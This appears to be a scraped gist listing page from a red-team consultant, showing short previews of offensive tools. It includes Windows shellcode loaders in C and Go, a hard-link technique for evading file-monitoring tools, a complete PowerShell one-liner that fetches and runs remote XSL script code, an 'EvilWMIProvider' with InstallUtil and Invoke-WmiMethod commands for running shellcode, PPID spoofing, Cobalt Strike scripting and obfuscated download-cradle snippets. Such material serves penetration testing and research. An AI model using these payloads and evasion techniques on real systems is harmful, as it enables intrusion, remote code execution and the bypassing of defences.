Mariusz B. mgeeky
Offensive Sencha Consultant
mgeeky / Get-AntiVirusProduct.ps1
Created Jan 14, 2021
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
function Get-AntiVirusProduct {
[CmdletBinding()]
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[Alias('name')]
$computername=$env:computername
)
mgeeky / hexdump.py
Created Jan 3, 2021
Hexdump implementation in Python
def hexdump(data, addr = 0, num = 0):
s = ''
n = 0
lines = []
if num == 0: num = len(data)
if len(data) == 0:
return '<empty>'
for i in range(0, num, 16):
mgeeky / shellcodeLoader.c
Last active Jan 26, 2021
Simplest Windows shellcode loader there can be, purely in C
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: ./shellcodeLoader <shellcode64>\n");
return 1;
}
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
View EvilWMIProvider.cs
// Based On LocalAdmin WMI Provider by Roger Zander
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
// Adapted For Evil By @subTee
// Executes x64 ShellCode
//
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
View PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
mgeeky / httprequest.cna
Last active Apr 7, 2020
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#
import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
mgeeky / Download-Cradles-Oneliners.md
Last active Feb 17, 2021
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String combined with -bxor, handy for deobfuscating dynamically built strings:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings: